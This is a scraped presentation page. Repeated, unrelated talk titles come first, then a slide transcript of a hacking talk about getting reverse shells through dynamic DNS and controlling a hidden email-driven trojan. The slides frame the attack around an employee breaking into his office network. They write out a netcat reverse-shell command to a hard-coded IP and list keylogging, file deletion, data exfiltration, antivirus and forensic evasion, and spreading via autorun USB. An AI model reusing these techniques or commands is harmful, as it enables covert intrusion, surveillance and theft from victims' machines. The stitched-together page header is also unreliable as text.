20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Spring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfSpring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdf
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

  • 1. Handle Explotion of Remote System Without Being Online !! By Merchant Bhaumik
  • 6. Who Am I ? • Currently Helping local law-enforcement And Helping In Securing Some Government Websites • Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection ) • Communicating with Metasploit Guys To Develop Term Called “ Universal Payload”
  • 7. Presentation Flow……. •Reverse Shell Using Dynamic-Dns Concepts • Getting Data From Victim Computer Using Email Tool
  • 8. We Will Understand This Mechanism By Considering One Scenario……..
  • 9. Jack’s Situaion………. Jack Working In A Company ...............! In Which All Computers Behind The NAT BOX……. ………………………! And He Just Decided To Break One Of The System Of His Office And Getting Shell From Office To Home Computer
  • 10. Problems For Jack…. •Company Has NIDS/IPS ( Network IDS ) ….. So No In Bound Connections…………. •He Don’t Know What IP Address Is Allocated By His ISP •He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic
  • 11. Good Thing For Jack…. • Jack’s Office Allow Him To Access His Gmail Account..N Allow Some OutBound Traffic..
  • 13. Why Reverse Shell ? •Reverse Shell is one of the powerful method for Bypassing Network Intrusion Detection Systems , Firewalls ( Most Of The) etc • Because Some of this network intrusion only monitors In-bound connection … Not the Out-bound …… • Jack Has DMZ Network In His Office…..
  • 14. Diagram 1 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  • 15. Diagram 2 (Normal Attack ! ) 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( Attacker IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 Step I : Start Handler on port 4343 nc –l –p 4343 Victim Step II : nc 49.24.3.12 4343 –e cmd.exe
  • 16. Normal Flow Of Getting Reverse Shell Exploit ! Attacker Starts Handler Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  • 17. But What’s Wrong With Jack? He Don’t Know What IP Address Is Allocated To His Computer ( Dynamic IP Allocation By ISPs)
  • 18. Solution…. Attacker Is “Offline” But Still He Will Get Reverse Shell
  • 19. My Way……. Exploit ! Starting Handler On Local Attacker Starts Handler Machine Is Optional ! Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  • 20. Flow Of Execution…… Attacker ! Attack Exe Running in Victim Machine * If Attacker is not online still the exe is up and running in Attacker No !! remote machine and Update IP? if attacker updates DNS records… The Yes !! Reverse Shell Is On The Attacker’s Desk !! Attacker Receives Reverse Shell
  • 21. Mechanism • If the Code ( First Part ) receives positive Acknowledgement of sending packets ………… Jack Will Get Reverse Shell……………. •Else keep running in the victim machine and waits for Ack. From attacker’ machine…
  • 22. Dynamic DNS Way…. (Initially ! ) • First Part : catchme.dyndns-ip.com ( 255.255.255.255 ) • Second Part : payload.dyndns-ip.com ( 255.255.255.255 ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  • 23. Dynamic DNS Way…. (Finally ! ) • First Part : catchme.dyndns-ip.com ( 127.0.0.1 ) • Second Part : payload.dyndns-ip.com (Attacker’s IP ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  • 24. Metasploit………….!!!!! •You can embed my method (or My Exe ) with metasploit Payload which is of your choice . * The Structure of new Exe will be as per follow : NEW FINAL EXE CONSIS OF My Tool Synchronous Execution MSF PAYLOAD ( Single EXE ) ( LHOST = Dynamic ) New.exe
  • 25. Hands On NetWork 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  • 26. Time To Enjoy Cooked Cookies And Recipes !!
  • 27. Demo
  • 29. Normal Remote Trojans & Viruses ! Attacker Victim (Must Be Online !) (Must Be Online !)
  • 30. My Tool !! Caution: No Need To Be Online !! Attackers !! Attacker Victim MAY MAY OR OR MAY NOT ONLINE !! MAY NOT ONLINE !!
  • 31. So, How It Works ?? Zombie Attacker Victim
  • 32. But, Who Is Zombie?? @ It may be one of the below : It is one of like it……. Or one like this….. Or like this…….
  • 33. Features !! Execute Operating System Level Commands By Using Emails ! Get all Network Card Information with Allocated IP Addresses ! Live Tracking Of the System being used by victim ! Get All available account‟ List ! Enable/Disable Key Logger ! This All Stuff With Gmail , Yahoo , Hotmail………!!
  • 34. About It ! It is a simple application which Once Up & Going on Victim‟ Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail Email Services… There is no need to be Online for Attacker to attack the Victim System….. Attacker Has to send attack instructions to Any of the mail service & then it is like sitting on the door & watching the event , “ when it‟s gonna open !!” As Victim Connects to the internet …. Attack Launches & the results are automatically sent back to the Attacker‟s email Address…..
  • 35. Cool Benefits !! If the email account is used by using One of like below then it is totally Anti- Forensic ! No Reverse Detection Is Possible ! Create Unique password for all individual victims who are infected … Ability to handle multiple clients simultaneously ….. Delete Files In Victims Computer by Simply Sending An Email.. No Antivirus Can Detect Attack Because Of HTTPS ……
  • 36. Tool Syntax ….. Password_For_Victim “: “Task_Commands”:” E.g. Pwd$98$ : Account_info : “Pwd$98$” is Password Command Which Sends back For The Particular Email Containing Account Info In Victim… Victim Computer !
  • 37. Snap Shot 1…(Load Attack Instructions) Password For Individual Victim Send Account info Of Victim.. Send Drive Info Of Victim… Sends Mac , Network card Info...
  • 38. Snap Shot 2…(Get Back Attack Result) Attached Info Of Victims Computer…! As Per Of Attacker‟ Choice My Emaill Account …… !
  • 40. No Fear Of Detection 1 No Direct Connection Between Attacker & Victim Attacker Victim
  • 41. No Fear Of Detection 2 No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It Self…….!
  • 42. How To Spread This Code?? Autorun.inf by USB Drives………. Phisical Access Of Victim‟s System….. During Metasploit Explotion ……
  • 43. Further Possible Development !! This Code Is Flexible Enough To Develop Further By My Hacker Friends….It Is Also Possible For Future To Send Exploits Or Trojans By Using This Code……. Any One Can Send Exploits , Trojans , RootKits , BackDoors By Simply Attaching It With Email And Sending It To His Own Account Or Account That is Configured In Victim‟ Code………
  • 44. Pros N Cons 1 ! ( Be Transparent !! ) Advantages are that the attacker never goin to caught if he/she using the browser like TOR , Anononymizer , VPNs or Any PROXy…. For accessing the attacking gmail account. No Antivirus can detect the Instruction data because all traffic gonna come from HTTPS …..! Only single email account of gmail goin to use for both the side. Attacker and victim machine both goin to connect same account but attacker knows ,But Victim Don‟t !!
  • 45. Pros N Cons 2 Disadvantage is that , if the victim has habit of checking the current connections using commands like „netstat –n‟ then possibility to detect Gmail connection when actually there is no browser activity. But still it is difficult to detect ………. Because process is running in Hidden mode….
  • 46. Hands On Time..! ( Demo)